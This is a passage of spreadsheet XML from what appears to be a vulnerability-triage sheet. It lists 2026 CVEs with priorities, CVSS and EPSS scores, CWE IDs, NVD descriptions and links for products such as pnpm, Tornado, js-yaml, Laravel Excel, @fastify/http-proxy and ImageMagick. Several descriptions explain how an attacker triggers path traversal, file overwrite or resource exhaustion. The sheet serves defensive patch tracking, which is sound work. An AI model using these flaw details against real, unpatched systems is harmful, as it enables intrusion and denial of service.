          <t>NVD</t>
        </is>
      </c>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr"/>
      <c r="Q518" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R518"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S518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79734</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79738</t>
        </is>
      </c>
      <c r="D519" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F519" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr"/>
      <c r="Q519" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R51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S519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79738</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79740</t>
        </is>
      </c>
      <c r="D520" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F520" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr"/>
      <c r="Q520" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R520"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S520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79740</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79950</t>
        </is>
      </c>
      <c r="D521" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F521" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr"/>
      <c r="Q521" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R521"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S521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79950</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80123</t>
        </is>
      </c>
      <c r="D522" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I522" s="5" t="inlineStr"/>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L522" s="5" t="inlineStr"/>
      <c r="M522" s="5" t="inlineStr"/>
      <c r="N522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O522" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr"/>
      <c r="Q522" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R522"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denial of service.</t>
        </is>
      </c>
      <c r="S522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80123</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80212</t>
        </is>
      </c>
      <c r="D523" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F523" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr"/>
      <c r="L523" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr"/>
      <c r="Q523" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R523" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the resolv gem before 0.7.2 for Ruby. Resolv::DNS::Resource.get_class, Resolv::DNS::Resource::Generic.create, and Resolv::DNS::SvcParam::Generic.create generate a new class for each unknown DNS resource record (type, class) pair, or each unknown SvcParamKey, encountered while decoding a response. Each generated class was permanently registered both as a constant on Resource (or SvcParam::Generic) and as an entry in a class-lookup hash (ClassHash), and thus the class remained reachable through that constant after the response was discarded. Type and class are each 16-bit values, and thus an attacker controlling DNS responses (a spoofed response, or a malicious or hijacked upstream DNS server) has roughly 2^32 distinct (type, class) pairs to choose from. A single response of a few hundred kilobytes carrying tens of thousands of distinct unknown types permanently grows process memory by tens of megabytes; repeated responses accumulate without bound and are never reclaimed by garbage collection, because the constant keeps each class alive. Any code path that calls Resolv::DNS::Message.decode on attacker-influenced DNS responses is affected. resolv is a default gem, and thus this is reachable from a plain Ruby installation without any additional dependency.</t>
        </is>
      </c>
      <c r="S523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80212</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80924</t>
        </is>
      </c>
      <c r="D524" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F524" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr"/>
      <c r="L524" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr"/>
      <c r="Q524" s="5" t="inlineStr"/>
      <c r="R524" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: krb5 - use kfree_sensitive() for derived key buffers
crypto_krb5_prepare_encryption() and crypto_krb5_prepare_checksum()
free the buffer holding the freshly derived keys with plain kfree(),
leaving the key material behind in the freed slab object.</t>
        </is>
      </c>
      <c r="S524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80924</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82393</t>
        </is>
      </c>
      <c r="D525" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F525" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr"/>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr"/>
      <c r="Q525" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73, CWE-94</t>
        </is>
      </c>
      <c r="R525" s="5" t="inlineStr">
        <is>
          <t>pnpm is a package manager. Prior to 10.34.5 and 11.11.0, pnpm accepts a scoped path traversal in a tarball dependency's package.json manifest name because pnpm11/resolving/npm-resolver/src/pickPackage.ts rejects slash characters only for unscoped names. During pnpm install, the unvalidated name reaches raw path joins in pnpm11/installing/deps-resolver/src/resolvePeers.ts, pnpm11/installing/deps-resolver/src/index.ts, and pnpm11/deps/graph-builder/src/lockfileToDepGraph.ts, causing package extraction outside node_modules and allowing attacker-controlled files to overwrite arbitrary filesystem paths even when --ignore-scripts is used. The overwrite can replace shell startup files, Git hooks, or installed package code and lead to code execution. This issue is fixed in versions 10.34.5, and 11.11.0.</t>
        </is>
      </c>
      <c r="S525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82393</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82397</t>
        </is>
      </c>
      <c r="D526" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F526" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr"/>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr"/>
      <c r="Q526" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-400</t>
        </is>
      </c>
      <c r="R526" s="5" t="inlineStr">
        <is>
          <t>Tornado is a Python web framework and asynchronous networking library. Prior to 6.5.8, Tornado parses application/x-www-form-urlencoded request bodies with urllib.parse.parse_qs in tornado/escape.py without passing max_num_fields. RequestHandler._execute in tornado/web.py parses the body before handler dispatch through HTTPServerRequest._parse_body and parse_body_arguments in tornado/httputil.py, so an unauthenticated request body containing millions of separator-delimited fields can synchronously stall the single-threaded event loop and delay every connection. The body is bounded only by max_buffer_size, which defaults to 104857600 bytes. This issue is fixed in version 6.5.8.</t>
        </is>
      </c>
      <c r="S526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82397</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84374</t>
        </is>
      </c>
      <c r="D527" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F527" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr"/>
      <c r="L527" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr"/>
      <c r="Q527" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="R527" s="5" t="inlineStr">
        <is>
          <t>Laravel Excel provides supercharged Excel exports and imports in Laravel. From 3.1.8 until 3.1.70, in src/Files/Disk.php the Maatwebsite\Excel\Files\Disk::copy() method resolves the caller-controlled $destination supplied through Excel::store(), $export-&gt;store(), or storeExcel() against the process working directory with realpath() instead of the configured filesystem disk. If the path names an existing writable file, Disk::copy() opens it with fopen() in rb+ mode and uses stream_copy_to_stream(), bypassing Flysystem path confinement and allowing an attacker whose application input controls the export path to overwrite arbitrary existing files with export content. The rb+ behavior creates a non-truncating overwrite and trailing bytes when the new export is shorter, and overwriting an executable PHP file can lead to remote code execution. This issue is fixed in version 3.1.70.</t>
        </is>
      </c>
      <c r="S527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84374</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84375</t>
        </is>
      </c>
      <c r="D528" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F528" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I528" s="5" t="inlineStr"/>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr"/>
      <c r="L528" s="5" t="inlineStr"/>
      <c r="M528" s="5" t="inlineStr"/>
      <c r="N528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O528" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr"/>
      <c r="Q528" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="R528" s="5" t="inlineStr">
        <is>
          <t>js-yaml is a JavaScript YAML parser and dumper. From 3.0.0 until 3.15.2 and 4.3.2, maxTotalMergeKeys in lib/js-yaml/loader.js and lib/loader.js does not count empty mapping sources while processing the merge key &lt;&lt;. An attacker can alias a large sequence of empty mappings into many merge targets, causing O(N * K) processing while totalMergeKeys remains unchanged and the configured resource limit is never reached. A relatively small YAML document can therefore cause prolonged CPU consumption in applications that parse untrusted YAML, and merge processing is enabled by default on these release lines. This issue is fixed in versions 3.15.2 and 4.3.2.</t>
        </is>
      </c>
      <c r="S528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84382</t>
        </is>
      </c>
      <c r="D529" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F529" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr"/>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr"/>
      <c r="Q529" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R529" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.12.0, the HTTPX2 content decoders in src/httpx2/httpx2/_decoders.py fully inflate each gzip, deflate, br, or zstd network chunk before iter_bytes() or aiter_bytes() yields bounded pieces to the application. A 64 KiB compressed chunk can expand to approximately 64 MiB in one intermediate allocation, so an attacker-controlled or compromised server can cause severe memory pressure or out-of-memory process termination even when the application streams the response. This issue is fixed in version 2.12.0.</t>
        </is>
      </c>
      <c r="S529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85124</t>
        </is>
      </c>
      <c r="D530" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F530" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr">
        <is>
          <t>fastify:fastify\/http-proxy</t>
        </is>
      </c>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr"/>
      <c r="Q530" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R530" s="5" t="inlineStr">
        <is>
          <t>@fastify/http-proxy versions before 11.6.2 do not validate proxied HTTP request paths for backslash based dot-segments before forwarding them to the configured upstream. The plain HTTP request handler skips the destination validation that the WebSocket path performs, and the underlying reply-from library only rejects forward-slash traversal, so a request containing backslash dot-segments can escape the boundary set by the prefix and rewritePrefix options. An unauthenticated network attacker can use this to reach upstream paths that were meant to stay hidden behind the proxy, resulting in disclosure of internal endpoints. This is a path traversal issue (CWE-22). Users should upgrade to @fastify/http-proxy 11.6.2 or later.</t>
        </is>
      </c>
      <c r="S530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85124</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85505</t>
        </is>
      </c>
      <c r="D531" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F531" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr"/>
      <c r="Q531" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R531" s="5" t="inlineStr">
        <is>
          <t>ipmi-oem in FreeIPMI before 1.6.19 has a stack-based buffer over-read in ipmi_oem_fujitsu_get_sel_entry_long_text in ipmi-oem/ipmi-oem-fujitsu.c when a BMC provides a short response, a different vulnerability than CVE-2026-50031 (which has different affected versions).</t>
        </is>
      </c>
      <c r="S531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85505</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86420</t>
        </is>
      </c>
      <c r="D532" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="L532" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr"/>
      <c r="Q532" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R532" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 and 6.9.13-55 fails to properly lower the memory budget when an operation inside OpenPixelCache fails. Repeated triggering of such failures can exhaust the process memory budget and result in a denial of service.</t>
        </is>
      </c>
      <c r="S532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86420</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86421</t>
        </is>
      </c>
      <c r="D533" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr"/>
      <c r="Q533" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R533" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 and 6.9.13-55 contains a memory leak in the MSL image decoder. A crafted MSL image triggers memory allocation without proper deallocation, allowing an attacker to exhaust memory and cause a denial of service.</t>
        </is>
      </c>
      <c r="S533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86421</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86429</t>
        </is>
      </c>
      <c r="D534" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr">
        <is>
          <t>thephpleague:commonmark</t>
        </is>
      </c>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr"/>
